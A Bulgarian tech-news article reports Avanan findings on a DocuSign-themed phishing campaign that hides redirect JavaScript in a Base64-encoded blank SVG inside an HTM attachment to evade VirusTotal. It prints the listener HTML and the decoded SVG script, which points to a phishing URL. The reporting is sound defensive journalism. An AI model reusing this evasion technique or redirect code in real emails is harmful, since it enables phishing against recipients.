fbpx
17.7 C
София

Хакерите започнаха да разпространяват малуер с помощта на празни изображения в имейлите

Най-четени

Даниел Десподов
Даниел Десподовhttps://www.kaldata.com/
Новинар. Увличам се от съвременни технологии, информационна безопасност, спорт, наука и изкуствен интелект.

Експертите по информационна сигурност на компанията Avanan съобщават, че хакерите са започнали да разпространяват вредоносен код в празните изображения на имейлите. Това им дава възможност да заобиколят проверките на VirusTotal.

Хакерите изпращат на жертвата мошенически документ, свързан с онлайн услугата DocuSign за работа и управление на електронната документация. В електронното писмо се казва, че документът трябва да бъде прегледан и подписан. По изпратения линк потребителят се препраща към истинската оригинална страница на DocuSign. Но основната роля играе прикрепеният HTM код, който се изпраща заедно с линка към DocuSign. В него е поставено SVG изображение, криптирано с помощта на Base64. Въпреки че това е празно изображение, в този файл има интегриран JavaScript код, който препраща потребителя към вредоносен URL адрес. Ето един пример:

<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <title>Title</title>
</head>

<body>
 
 <script>
  window.addEventListener("message", (event) => {
    console.log(event)
    if (event.data)
      window.location = event.data;
  }, false);
 </script>
</body>

</html>

Ако това изображение се декриптира, всичко започва да изглежда по съвсем друг начин:

<?xml version="1.0" ?>

<svg xmlns="http://www.w3.org/2000/svg">

 <circle></circle>

 <script type="text/javascript">
  <![CDATA[parent.window.postMessage("https://awin1.com/cread.php?awinmid=16328&awinaffid=421225&ued=https://na4docucheck.nightsky.tk/?username=<I removed the full user name from here>", "*")]]>
 </script>

</svg>

Онлайн услугите от рода на VirusTotal не могат да откриват малуера от подобен род, понеже той е скрит в изображение. Във връзка с това на потребителите се препоръчва да бъдат внимателни към всякакви имейли, в които се вижда прикрепен подобен модул към тях.


Коментирайте статията в нашите Форуми. За да научите първи най-важното, харесайте страницата ни във Facebook, и ни последвайте в Telegram и Viber или изтеглете приложението на Kaldata.com за Android, iOS и Huawei!

Абонирай се
Извести ме за
guest

0 Коментара
Отзиви
Всички коментари

Нови ревюта

Подобни новини